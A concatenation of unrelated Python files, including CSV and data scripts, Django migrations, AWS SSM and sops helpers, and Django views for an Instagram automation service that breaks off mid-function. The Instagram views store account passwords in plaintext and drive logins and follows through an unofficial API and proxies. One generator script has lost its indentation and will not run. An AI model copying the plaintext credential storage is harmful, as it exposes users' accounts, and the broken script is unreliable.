    whose top contributor holds at least `threshold` percent of the file's
    knowledge, each rounded to one decimal place."""
    total_lines = sum(f['lines'] for f in data)
    total_files = len(data)
    hot = [f for f in data if f['contrib_percent'] >= threshold]
    hot_lines = sum(f['lines'] for f in hot)
    return (round(hot_lines / total_lines * 100, 1),
            round(len(hot) / total_files * 100, 1))
def main(argv):
    """Merge the per-project contribution CSVs found in argv[1] into one
    summary CSV written to argv[2], one row per project.

    Refactor: the original repeated the same sum/len/round expression six
    times inline; the computation now lives in _concentration_stats.
    """
    data_dir = argv[1]
    output_file = argv[2]
    result = []
    for data_file in os.listdir(data_dir):
        with open(os.path.join(data_dir, data_file), newline="") as csv_file:
            data = [{'contrib_percent': float(row['top_single_dev_contribution_knowledge_percent']),
                     'lines': float(row['lines_count'])}
                    for row in csv.DictReader(csv_file)]
        entry = {'project': data_file}
        for threshold in (70, 80, 90):
            lines_pct, files_pct = _concentration_stats(data, threshold)
            entry['{}% lines'.format(threshold)] = lines_pct
            entry['{}% files'.format(threshold)] = files_pct
        result.append(entry)
    # Column order matches the module-level csv_header declaration.
    fieldnames = ['project'] + [
        '{}% {}'.format(pct, unit) for pct in (70, 80, 90) for unit in ('lines', 'files')]
    with open(output_file, 'w', newline='') as output:
        writer = csv.DictWriter(output, fieldnames)
        writer.writeheader()
        writer.writerows(result)
# CLI entry point: python3 get_sac_files_lines.py <data_dir> <output_csv>
if __name__ == "__main__":
    main(sys.argv)
|
import sys
import os
# Redirect stdin to a local test-input file (competitive-programming
# convenience so the solution can be run without piping input).
# NOTE(review): hard-coded Windows path -- breaks on any other machine;
# confirm this is only for local testing.
f = open("C:/Users/user/Documents/atCoderProblem/import.txt","r")
sys.stdin = f
# -*- coding: utf-8 -*-
n = int(input())   # length of the string
s = list(input())  # the string, as a list of single characters
def list_intersection(a, b):
    """Return the multiset intersection of sequences `a` and `b`.

    Elements appear in the order they occur in `a`, and each element of `b`
    is matched at most once.  Requires hashable elements.

    Rewrite: the original was O(len(a)*len(b)) and destroyed its arguments
    by overwriting matched cells with "_" / "&" sentinel values (which could
    also collide with real data).  This version is O(len(a)+len(b)) and does
    not mutate its inputs; the only call site passes fresh slices, so the
    result is unchanged.
    """
    from collections import Counter
    available = Counter(b)  # how many of each element of b remain unmatched
    c = []
    for item in a:
        if available[item] > 0:
            c.append(item)
            available[item] -= 1
    return c
# For every cut point, count the distinct letters shared between the prefix
# and the suffix (as multisets), and keep the maximum over all cuts.
ans = 0
for cut in range(1, n):
    shared = list_intersection(s[:cut], s[cut:])
    ans = max(ans, len(set(shared)))
print(ans)
|
# Generated by Django 3.0.3 on 2020-05-11 18:21
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 3.0.3): retype dimensaomodel fields --
    the numeric measurements become FloatField, while espessura and
    fornecedor become bounded CharFields."""
    dependencies = [
        ('dimensoes', '0009_auto_20200504_1529'),
    ]
    operations = [
        migrations.AlterField(
            model_name='dimensaomodel',
            name='comprimento',
            field=models.FloatField(),
        ),
        migrations.AlterField(
            model_name='dimensaomodel',
            name='espessura',
            field=models.CharField(max_length=3),
        ),
        migrations.AlterField(
            model_name='dimensaomodel',
            name='fornecedor',
            field=models.CharField(max_length=8),
        ),
        migrations.AlterField(
            model_name='dimensaomodel',
            name='largura',
            field=models.FloatField(),
        ),
        migrations.AlterField(
            model_name='dimensaomodel',
            name='largura_calcada',
            field=models.FloatField(),
        ),
        migrations.AlterField(
            model_name='dimensaomodel',
            name='prof_final',
            field=models.FloatField(),
        ),
        migrations.AlterField(
            model_name='dimensaomodel',
            name='prof_inicial',
            field=models.FloatField(),
        ),
    ]
|
#!/usr/bin/python
#-*- coding: utf-8 -*-
#生成Java和CSharp所需要的MessageID文件
import os
import sys
#设置初始ID值,这里必须从20002开始,server端定义login方法如果不是20002就返回错误,fuck!!!
start_index = 20002
java_class_name = "HOpCodeEx.java"
cs_class_name = "MessageID.cs"
proto_file = open("PBMessage.proto","r")
lines = proto_file.readlines()
#删除旧文件
if os.path.exists(java_class_name):
os.remove(java_class_name)
if os.path.exists(cs_class_name):
os.remove(cs_class_name)
#-------------------------临时添加PacketDistributed在这里开始-------------------------
PacketDistributed_class_name = "PacketDistributed.cs"
if os.path.exists(PacketDistributed_class_name):
os.remove(PacketDistributed_class_name)
#-------------------------临时添加PacketDistributed在这里结束-------------------------
# 初始化CS文件
newCSharplines = []
newCSharpFile = open(cs_class_name,"wb")
newCSharpFile.write("//Auto Generate File, Do NOT Modify!!!!!!!!!!!!!!!\n")
newCSharpFile.write("using System;\n")
newCSharpFile.write("namespace xjgame.message\n")
newCSharpFile.write("{\n")
newCSharpFile.write("\tpublic enum MessageID\n")
newCSharpFile.write("\t{\n")
#初始化JAVA文件
newJavaFile = open(java_class_name,"wb")
newJavaFile.write("package xjgame.server;\n")
newJavaFile.write("//Auto Generate File, Do NOT Modify!!!!!!!!!!!!!!!\n")
newJavaFile.write("import cyou.mrd.io.http.HOpCode;\n")
newJavaFile.write("public class HOpCodeEx extends HOpCode {\n")
#遍历生成ID
for line in lines:
#if line.startswith("//"):
#newCSharpFile.write( "%s" % (line))
#newJavaFile.write( "%s" % (line))
if line.startswith("message"):
text = line.split(' ')
if text[1].find("\n") > 0:
message_name = text[1].split("\n")
else:
message_name = text[1]
newCSharpFile.write( "\t\t%s = %s,\n" % (message_name[0],start_index))
newJavaFile.write( "\tpublic static final short %s = %s;\n" % (message_name[0],start_index))
start_index = start_index + 1
print message_name[0]
#java文件结束
newJavaFile.write("\n}\n")
newJavaFile.close()
#c sharp文件结束
newCSharpFile.write("\n\t}\n")
#-------------------------临时添加Enum在这里开始-------------------------
inEnum = False
for line in lines:
if line.find("enum ") > 0:
inEnum = True
newCSharpFile.write( "\tpublic %s" % (line))
print line
elif inEnum == True:
if line.find("}") > 0:
inEnum = False
if line.find(";") > 0:
line = line.split(';')
line = "%s,\n" % (line[0])
newCSharpFile.write( "\t%s" % (line))
print line
#-------------------------临时添加Enum在这里结束-------------------------
#-------------------------临时添加PacketDistributed在这里开始-------------------------
#初始化
PacketDistributedFile = open(PacketDistributed_class_name,"wb")
PacketDistributedFile.write("//Auto Generate File, Do NOT Modify!!!!!!!!!!!!!!!\n")
PacketDistributedFile.write(
'''
using System.IO;
using System;
using System.Net.Sockets;
using Google.ProtocolBuffers;
using xjgame.message;
using card.net;
public abstract class PacketDistributed\n
{
public static PacketDistributed CreatePacket(MessageID packetID)
{
PacketDistributed packet = null;
switch (packetID)
{
''')
#遍历生成case
for line in lines:
if line.startswith("message"):
text = line.split(' ')
if text[1].find("\n") > 0:
message_name = text[1].split("\n")
else:
message_name = text[1]
PacketDistributedFile.write( "\t\t\tcase MessageID.%s: { packet = new %s();}break;\n" % (message_name[0],message_name[0]))
PacketDistributedFile.write(
'''
}
if (null != packet)
{
packet.packetID = packetID;
}
//netActionTime = DateTime.Now.ToFileTimeUtc();
return packet;
}
public byte[] ToByteArray()
{
//Check must init
if (!IsInitialized())
{
throw InvalidProtocolBufferException.ErrorMsg("Request data have not set");
}
byte[] data = new byte[SerializedSize()];
CodedOutputStream output = CodedOutputStream.CreateInstance(data);
WriteTo(output);
output.CheckNoSpaceLeft();
return data;
}
public PacketDistributed ParseFrom(byte[] data)
{
CodedInputStream input = CodedInputStream.CreateInstance(data);
PacketDistributed inst = MergeFrom(input,this);
input.CheckLastTagWas(0);
return inst;
}
public abstract int SerializedSize();
public abstract void WriteTo(CodedOutputStream data);
public abstract PacketDistributed MergeFrom(CodedInputStream input,PacketDistributed _Inst);
public abstract bool IsInitialized();
protected MessageID packetID;
public MessageID getMessageID()
{
return packetID;
}
}
'''
)
PacketDistributedFile.close()
#-------------------------临时添加PacketDistributed在这里结束-------------------------
newCSharpFile.write("}\n")
newCSharpFile.close()
proto_file.close()
|
import boto3
import json
def get_system_manager_info():
    """Print SSM association, document and command details for every region.

    Queries each AWS region's SSM service, collects the described items
    (each wrapped in its own single-element list, as the original did),
    and prints three JSON documents to stdout.
    """
    ec2 = boto3.client('ec2')
    regions = [r['RegionName'] for r in ec2.describe_regions()['Regions']]
    association_details = []
    document_details = []
    command_details = []
    for region in regions:
        client = boto3.client('ssm', region_name=region)
        # Associations: list the names first, then describe each one.
        assoc_names = [a['Name'] for a in client.list_associations()['Associations']]
        for name in assoc_names:
            desc = client.describe_association(Name=name)['AssociationDescription']
            association_details.append([desc])
        # Documents: same list-then-describe pattern.
        doc_names = [d['Name'] for d in client.list_documents()['DocumentIdentifiers']]
        for name in doc_names:
            doc = client.describe_document(Name=name)['Document']
            document_details.append([doc])
        # Commands come fully described from the list call.
        for cmd in client.list_commands()['Commands']:
            command_details.append([cmd])
    # default=str stringifies datetimes and other non-JSON types.
    print(json.dumps({"Associations": association_details}, indent=4, default=str))
    print(json.dumps({"Documents": document_details}, indent=4, default=str))
    print(json.dumps({"Commands": command_details}, indent=4, default=str))
# Run the report when this module is executed (or imported).
get_system_manager_info()
|
# Generated by Django 2.2.1 on 2019-07-28 13:58
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated (Django 2.2.1): order Notice objects newest-first
    by publication date."""
    dependencies = [
        ('notice', '0013_comment_comment_writer'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='notice',
            options={'ordering': ['-pub_date']},
        ),
    ]
|
a = 'mini'
b = 'ari'
print "%r/n loves %r !" %( a , b )
|
import base64
import eventlet
import os
import subprocess
import sys
import yaml
from forge.tasks import sh, TaskError
def key_check():
    """Abort with a TaskError unless the SOPS master key is configured."""
    if os.getenv('SOPS_KMS_ARN'):
        return
    raise TaskError("You must obtain the master key and export it in the 'SOPS_KMS_ARN' environment variable")
def decrypt(secret_file_dir, secret_file_name):
    """Decrypt a sops-encrypted secret file in place.

    The encrypted original is parked at "tmp-<name>" in the same directory
    (decrypt_cleanup later restores it) and the decrypted plaintext is
    written under the original name.
    """
    key_check()
    secret_file_path = os.path.join(secret_file_dir, secret_file_name)
    temp_secret_file_path = os.path.join(secret_file_dir, "tmp-" + secret_file_name)
    os.rename(secret_file_path, temp_secret_file_path)
    # sops decrypts the parked ciphertext; stdout captured via the task runner.
    decrypted_content = sh("sops", "--output-type", "binary", "-d", temp_secret_file_path).output
    with open(secret_file_path, "w") as decrypted_file:
        decrypted_file.write(decrypted_content)
def decrypt_cleanup(secret_file_dir, secret_file_name):
    """Discard the decrypted plaintext and restore the parked encrypted file
    (the inverse of decrypt())."""
    plain_path = os.path.join(secret_file_dir, secret_file_name)
    encrypted_path = os.path.join(secret_file_dir, "tmp-" + secret_file_name)
    os.remove(plain_path)
    os.rename(encrypted_path, plain_path)
def edit_secret(secret_file_path, create):
    """Open an interactive sops editing session on `secret_file_path`.

    If the file is missing and `create` is true, an empty encrypted file is
    seeded first; a missing file without `create` is an error.
    (Python 2 syntax: `except ExcType, e`.)
    """
    key_check()
    if not os.path.exists(secret_file_path):
        if not create:
            raise TaskError("no such file: %s" % secret_file_path)
        # Seed a new encrypted file from /dev/null so sops has content to edit.
        content = sh("sops", "--input-type", "binary", "-e", "/dev/null").output
        try:
            with open(secret_file_path, "w") as fd:
                fd.write(content)
        except IOError, e:
            raise TaskError(e)
    try:
        # Interactive edit; sops re-encrypts the file on save.
        subprocess.check_call(["sops", "--input-type", "binary", "--output-type", "binary", secret_file_path])
    except eventlet.green.subprocess.CalledProcessError, e:
        raise TaskError(e)
def view_secret(secret_file_path):
    """Print the decrypted contents of a sops-encrypted file to stdout.

    (Python 2 syntax: `except ExcType, e`.)
    """
    key_check()
    try:
        # sops -d writes the plaintext to stdout; nothing touches the disk.
        subprocess.check_call(["sops", "--output-type", "binary", "-d", secret_file_path])
    except eventlet.green.subprocess.CalledProcessError, e:
        raise TaskError(e)
|
"""
Train Script of Auto Encoder Model
"""
import numpy as np
import torch
import torchvision
import torchvision.transforms as transforms
import torch.optim as optim
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from model import AutoEncoder, CAE
from load_data import ImbalancedCIFAR10
# Prefer the first GPU when one is available.
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
# Per-class keep ratios for CIFAR-10: classes 2, 4 and 9 are downsampled to 50%.
train_imbalance_class_ratio = np.array([1., 1., .5, 1., .5, 1., 1., 1., 1., .5])
#train_imbalance_class_ratio = np.array([1.] * 10)
train_imbalanced_dataset = ImbalancedCIFAR10(train_imbalance_class_ratio)
train_imbalanced_loader = DataLoader(train_imbalanced_dataset, batch_size=64, shuffle=True, num_workers=4)
# net = AutoEncoder()
net = CAE()  # convolutional auto-encoder variant
net = net.to(device)
# Reconstruction loss; BCE presumes outputs/targets lie in [0, 1] --
# TODO confirm the model's final activation matches.
criterion = nn.BCELoss()
# criterion = nn.MSELoss()
optimizer = optim.Adam(net.parameters())
# Train Model
for epoch in range(3):
    running_loss = 0.0
    for i, (inputs, _) in enumerate(train_imbalanced_loader, 0):
        inputs = inputs.to(device)
        outputs = net(inputs)
        # Auto-encoder objective: reconstruct the input (labels are ignored).
        loss = criterion(outputs, inputs)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        running_loss += loss.item()
        if i % 200 == 199:
            # Report the mean loss over the last 200 mini-batches.
            print('[%d, %5d] loss: %.3f' %
                  (epoch + 1, i + 1, running_loss / 200))
            running_loss = 0.0
# Save Model
torch.save(net.state_dict(), 'model_weights/auto_encoder')
|
# Demonstrate set difference: the elements of one set absent from the other.
s1 = set("aeiou")  # the vowels
s2 = set("klmno")
s3 = s1 - s2       # vowels not in s2 -> "o" is removed
print(s3)
s4 = s2 - s1       # members of s2 that are not vowels -> "o" is removed
print(s4)
print(s4 - s3)     # s3 and s4 are disjoint, so the difference is all of s4
|
# Greeting banner for "Spin That Mission": define both messages, then print
# them in order.
STM_message1 = "Welcome to Spin That Mission!"
STM_message2 = "Click Ok to Start"
for _msg in (STM_message1, STM_message2):
    print(_msg)
import tkinter as tk
def recalc():
    """Read the Celsius entry, convert to Fahrenheit (2 decimal places) and
    display the result; show "invalid" for non-numeric input."""
    raw_value = entry_cel.get()
    try:
        converted = round(float(raw_value) * 9/5 + 32, 2)
        result_far.config(text=converted)
    except ValueError:
        # float() failed: the entry does not contain a number.
        result_far.config(text="invalid")
# create the application window and add a frame
window = tk.Tk()
window.title("Temp Converter")
frame = tk.Frame()
frame.grid(padx=5, pady=5) # pad top and left of frame 5 pixels before grid
# create and add text labels
label_cel = tk.Label(frame, text="Celsius Temp:")
label_cel.grid(row=1, column=1, sticky="w")
label_far = tk.Label(frame, text="Fahrenheit Temp:")
label_far.grid(row=2, column=1)
# create and add space for user entry of text
entry_cel = tk.Entry(frame, width=7)
entry_cel.grid(row=1, column=2)
entry_cel.insert(0,0)  # pre-fill the entry with 0 degrees Celsius
# create and add label for text calculation result
result_far = tk.Label(frame, width=7)
result_far.grid(row=2, column=2)
# create and add 'recalc' button
btn_recalc = tk.Button(frame, text="Recalculate", command=recalc)
btn_recalc.grid(row=1, column=3, rowspan=2)
# Populate the result label once before entering the event loop.
recalc()
window.mainloop()
|
# -*- coding: utf-8 -*-
from collective.cover.tiles.base import IPersistentCoverTile
from collective.cover.tiles.base import PersistentCoverTile
from plone.app.uuid.utils import uuidToObject
from plone.memoize import view
from plone.tiles.interfaces import ITileDataManager
from plone.uuid.interfaces import IUUID
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from sc.photogallery import _
from sc.photogallery.utils import PhotoGalleryMixin
from zope import schema
from zope.interface import implementer
class IPhotoGalleryTile(IPersistentCoverTile):
    """A tile that shows a photo gallery."""
    # UUID of the referenced Photo Gallery object; filled in by
    # PhotoGalleryTile.populate_with_object, never edited directly.
    uuid = schema.TextLine(
        title=_(u'UUID'),
        required=False,
        readonly=True,
    )
@implementer(IPhotoGalleryTile)
class PhotoGalleryTile(PersistentCoverTile, PhotoGalleryMixin):
    """A tile that shows a photo gallery."""
    index = ViewPageTemplateFile('photogallery.pt')
    # Cover tile behaviour flags: configurable and drag-and-drop target,
    # but not inline-editable.
    is_configurable = True
    is_editable = False
    is_droppable = True
    short_name = _(u'msg_short_name_photogallery', u'Photo Gallery')
    def accepted_ct(self):
        """Accept only Photo Gallery objects."""
        return ['Photo Gallery']
    def populate_with_object(self, obj):
        """Store the dropped object's UUID if it is an accepted content type."""
        super(PhotoGalleryTile, self).populate_with_object(obj)  # check permissions
        if obj.portal_type in self.accepted_ct():
            uuid = IUUID(obj)
            data_mgr = ITileDataManager(self)
            data_mgr.set(dict(uuid=uuid))
    def is_empty(self):
        """True when no UUID is stored or it no longer resolves to an object."""
        return (self.data.get('uuid', None) is None or
                uuidToObject(self.data.get('uuid')) is None)
    @view.memoize
    def gallery(self):
        """Resolve and cache the referenced Photo Gallery object."""
        return uuidToObject(self.data.get('uuid'))
    @view.memoize
    def results(self):
        """List (and cache) the gallery's folder contents."""
        gallery = self.gallery()
        return gallery.listFolderContents()
    def image(self, obj, scale='large'):
        """Return an image scale if the item has an image field.
        :param obj: [required]
        :type obj: content type object
        :param scale: the scale to be used
        :type scale: string
        """
        scales = obj.restrictedTraverse('@@images')
        return scales.scale('image', scale)
|
from django.shortcuts import render,redirect
from .models import *
from aristo.models import *
from payment.models import *
from instagram import functions
from django.contrib.auth.models import User
from django.contrib.auth import login, authenticate, logout
from instagram import private_api
import time
from . import tasks
from datetime import datetime, timezone,timedelta
# NOTE(review): evaluated once at import time -- `now` is frozen at process
# start, not the time of each request; confirm that is intended.
now = datetime.now(timezone.utc)
from django.contrib.auth.decorators import login_required
from django.core.mail import send_mail
from django.contrib.auth.tokens import PasswordResetTokenGenerator
from django.core.mail import EmailMessage
from django.template.loader import render_to_string
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.http import HttpResponse
from instagram import private_api
from instagram_private_api import (Client, ClientError, ClientLoginError,ClientCookieExpiredError, ClientLoginRequiredError, ClientThrottledError,__version__ as client_version)
#Dashboard Views
@login_required(login_url='/login/')
def change_active_account(request, username):
    """Make *username* the single active Instagram account of this user."""
    accounts = Instagram_Accounts.objects
    # Clear the flag on every account of the user, then set it on the target.
    accounts.filter(main_user__username=request.user).update(is_current_account=0)
    accounts.filter(username=username).update(is_current_account=1)
    return profile(request)
@login_required(login_url='/landing/')
def dashboard(request):
    """Render the dashboard page.

    On POST, changes the activity status of the selected assistant; the
    "type" values are Turkish UI commands (sonlandir=terminate -> 3,
    durdur=pause -> 0, devam_et=resume -> 1, baslat=start -> redirect to
    the assistant wizard).  Afterwards it gathers the linked accounts,
    assistants and action/return statistics for the template.
    """
    if request.POST:
        assistant = Assistants.objects.filter(id=request.POST["assistant"])
        if len(assistant) == 0:
            pass  # unknown assistant id: silently ignore the command
        else:
            assistant = assistant[0]
            if request.POST["type"]=="sonlandır":
                # terminate
                assistant.activity_status = 3
                assistant.update_time = datetime.now(timezone.utc)
                assistant.save()
            elif request.POST["type"]=="durdur":
                # pause
                assistant.activity_status = 0
                assistant.update_time = datetime.now(timezone.utc)
                assistant.save()
            elif request.POST["type"]=="devam_et":
                # resume
                assistant.activity_status = 1
                assistant.update_time = datetime.now(timezone.utc)
                assistant.save()
            elif request.POST["type"]=="başlat":
                return redirect("/select_assistant/")
    all_new_ffs = functions.new_actions(request.user)
    ig_accounts_list= functions.get_linked_accounts(request.user)
    linked_assistants_list=functions.linked_assistants(request.user)
    # Copy the nested rows so the marker strings appended below do not
    # mutate whatever functions.linked_assistants() returned.
    new_linked_assistants_list = []
    for i in linked_assistants_list:
        deneme = []
        for b in i:
            deneme.append(b)
        new_linked_assistants_list.append(deneme)
    a = 0
    ohow = []
    # Rows of length 2 are appended as-is; up to four other rows are tagged
    # with template marker strings ("x", "y", "z", "ogg") and kept in front.
    for i in new_linked_assistants_list:
        if len(i) == 2:
            ohow.append(i)
        else:
            if a == 0:
                i.append("x")
                ohow.insert(0,i)
                a += 1
            elif a == 1:
                i.append("y")
                ohow.insert(1,i)
                a += 1
            elif a == 2:
                ohow.insert(2,i)
                i.append("z")
                a += 1
            elif a == 3:
                ohow.insert(3,i)
                i.append("ogg")
    # Every successful (status=1) action of any of the user's accounts.
    follow_actions = Follow_Actions.objects.filter(instagram_account__main_user__username = request.user,status = 1)
    like_actions = Like_Actions.objects.filter(instagram_account__main_user__username = request.user,status = 1)
    comment_actions = Comment_Actions.objects.filter(instagram_account__main_user__username = request.user,status = 1)
    unfollow_actions = Unfollow_Actions.objects.filter(instagram_account__main_user__username = request.user,status = 1)
    total_actions = []
    for i in follow_actions:
        total_actions.append(i)
    for i in like_actions:
        total_actions.append(i)
    for i in comment_actions:
        total_actions.append(i)
    for i in unfollow_actions:
        total_actions.append(i)
    # Count how many of the targeted users followed back (is_follower=1).
    total_actions_return = 0
    for i in total_actions:
        analyse_ffs = Analyse_FF.objects.filter(instagram_account__main_user__username = request.user,ig_user = i.ig_user,is_follower = 1)
        if len(analyse_ffs) == 0:
            pass
        else:
            total_actions_return +=1
    try:
        percentage_of_actions_return = round((total_actions_return/len(total_actions)*100))
    except:
        # No actions yet -> division by zero; show 1% over one dummy action.
        percentage_of_actions_return = 1
        total_actions = ["x"]
    return render(request, "dashboard.html",{"ig_accounts":ig_accounts_list,"linked_assistants":ohow,"all_new_ffs":all_new_ffs,"percentage_of_actions_return":percentage_of_actions_return,"total_actions":len(total_actions),"total_actions_return":total_actions_return})
@login_required(login_url='/login/')
def add_insta_account(request):
    """Link a new Instagram account to the logged-in user's profile.

    Validates e-mail activation and the license account limit, then drives
    the Instagram private-API login, including the challenge (SMS / e-mail
    verification code) flow tracked by Challenge_User rows.
    ``private_api.check_is_real`` returns either a logged-in API client on
    success or an integer error code (1..11) that selects the Turkish error
    popup rendered into profile.html.
    """
    if request.POST:
        ig_accounts_list=functions.get_linked_accounts(request.user)
        user = User.objects.get(username = request.user)
        check_license = License.objects.filter(main_user__username = request.user)[0]
        account_limit = check_license.package.account_count
        all_proxies = SocinstaProxy.objects.filter()
        # Guard rails: activated e-mail and license with room for one more account.
        if user.is_active == False:
            return render(request,"profile.html",{"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error(' Lütfen hesap eklemek için mailinizden hesabınızı onaylayın')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
        elif account_limit == 0:
            return render(request,"profile.html",{"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen hesap eklemek için lisans sürümünüzü yükseltin')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
        elif len(ig_accounts_list)>=account_limit:
            return render(request,"profile.html",{"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Hesap ekleme limitine ulaştınız , daha fazla hesap eklemek için paketinizi yükseltebilirsiniz.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
        username=request.POST["instagram_username"]
        password=request.POST["instagram_password"]
        selected_proxy_id = request.POST['selected_proxy_id']
        current_proxy = SocinstaProxy.objects.filter(id=selected_proxy_id)
        # Track the (possibly multi-step) login challenge for this username.
        challenge_user = Challenge_User.objects.filter(username = username)
        if len(challenge_user) == 0:
            challenge_user = Challenge_User(username = username,main_user=request.user,password = password)
            challenge_user.save()
        challenge_user = Challenge_User.objects.filter(username = username)[0]
        # sms_or_mail appears to encode: 0 = SMS, 1 = e-mail, 2 = not chosen yet.
        if challenge_user.sms_or_mail == 2:
            challenge_required_mail = request.POST.get("mail")
            challenge_required_sms = request.POST.get("sms")
            if challenge_required_sms == "on":
                sms_or_mail = 0
                challenge_user.sms_or_mail = sms_or_mail
            else:
                if challenge_required_mail == "on":
                    sms_or_mail = 1
                    challenge_user.sms_or_mail = sms_or_mail
                else:
                    pass
        else:
            pass
        challenge_user.save()
        challenge_user = Challenge_User.objects.filter(username = username)[0]
        challenge_code = request.POST["challenge_code"]
        # "0" cancels the challenge flow; "" means no code was entered yet.
        if challenge_code == "0":
            challenge_user.delete()
            check_linked_assistants_list=functions.check_linked_assistans(request.user)
            return render(request,"profile.html",{"wow":"none","wow2":"block","challenge_code":"none","user":request.user,"ig_accounts":ig_accounts_list,"assistants_list":check_linked_assistants_list,"license_data":functions.license_data(request.user),"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none"})
        elif challenge_code == "":
            challenge_code = 2
        else:
            challenge_user.challenge_code = challenge_code
            challenge_user.save()
        control_instagram_user=Instagram_Accounts.objects.filter(username=username)
        if len(control_instagram_user)==0:
            challenge_code = challenge_user.challenge_code
            sms_or_mail = challenge_user.sms_or_mail
            challenge_user.save()
            # check_is_real may also raise an error during authentication.
            check_user=private_api.check_is_real(request.user,username,password,challenge_code = challenge_code,sms_or_mail = sms_or_mail,proxy_id=selected_proxy_id)
            if check_user == None:
                check_user = 11
            if type(check_user) != int:
                # Success: check_user is a logged-in API client, not an error code.
                api = check_user
                rank_token = Client.generate_uuid()
                try:
                    info = api.username_info(username)
                except:
                    challenge_user.delete()
                    return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Çok fazla deneme yaptınız, lütfen daha sonra yeniden deneyiniz.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
                follower_count = info.get("user").get("follower_count")
                following_count = info.get("user").get("following_count")
                post_count = info.get("user").get("media_count")
                profile_pic_url = info.get("user").get("profile_pic_url")
                user_pk = info.get("user").get("pk")
                full_name = info.get("user").get("full_name")
                is_private = info.get("user").get("is_private")
                biography = info.get("user").get("biography")
                is_business = info.get("user").get("is_business")
                # The new account becomes the single active one.
                Instagram_Accounts.objects.filter(main_user=request.user).update(is_current_account=0)
                New_IG_Account=Instagram_Accounts(main_user=request.user,username=username,password=password,is_current_account=1,user_pk=user_pk,
                                                full_name = full_name,is_private=is_private,
                                                biography = biography,is_business = is_business,profile_pic_url = profile_pic_url,current_proxy=current_proxy[0])
                New_IG_Account.save()
                private_api.create_cookie(api.settings, username, rank_token)
                new_ig_analyse=Instagram_Accounts_Analyse(instagram_account=New_IG_Account,media_count=post_count,follower_count=follower_count,following_count=following_count)
                new_ig_analyse.save()
                challenge_user.instagram_account = New_IG_Account
                challenge_user.save()
                # Celery: analyse the new account in the background.
                tasks.analyse_ig_account.apply_async(queue='deneme1',args=[username])
                # TODO: the return statements below need to be reorganised.
                ig_accounts_list=functions.get_linked_accounts(request.user)
                return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"none","wow2":"block","challenge_code":"none","pop_up":"add_insta_account_success('Hesap başarıyla eklendi')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
            # The verification steps needed while adding an account are also
            # handled below; each error code maps to one Turkish popup message.
            elif check_user == 1:
                challenge_user.delete()
                return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Böyle bir kullanıcı bulunamadı.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
            elif check_user == 2:
                challenge_user.delete()
                return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Yanlış şifre!')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
            elif check_user == 3:
                return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen 1 saat bekleyip yeniden deneyin!')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
            elif check_user == 4:
                return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen instagrama girerek gerçekleştiren eylemi ben yaptım seçeneğini işaretleyiniz')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
            elif check_user == 5:
                return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"block","pop_up":"add_insta_account_error('Lütfen telefonunza yada mailinize gelin kodu doğru bir şekilde giriniz!')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"none","ig_username_disabled":"block","sms_or_mail":"none","ig_user":username,"ig_user_password":password,"license_data":functions.license_data(request.user)})
            elif check_user == 6:
                return render(request,"profile.html",{"current_proxy":current_proxy,"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen hesabınızı onaylama yönteminiz seçiniz!')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"none","ig_username_disabled":"block","sms_or_mail":"block","ig_user":username,"ig_user_password":password,"license_data":functions.license_data(request.user)})
            elif check_user == 7:
                return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"block","pop_up":"add_insta_account_error('Bilinmeyen hata')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
            elif check_user == 8:
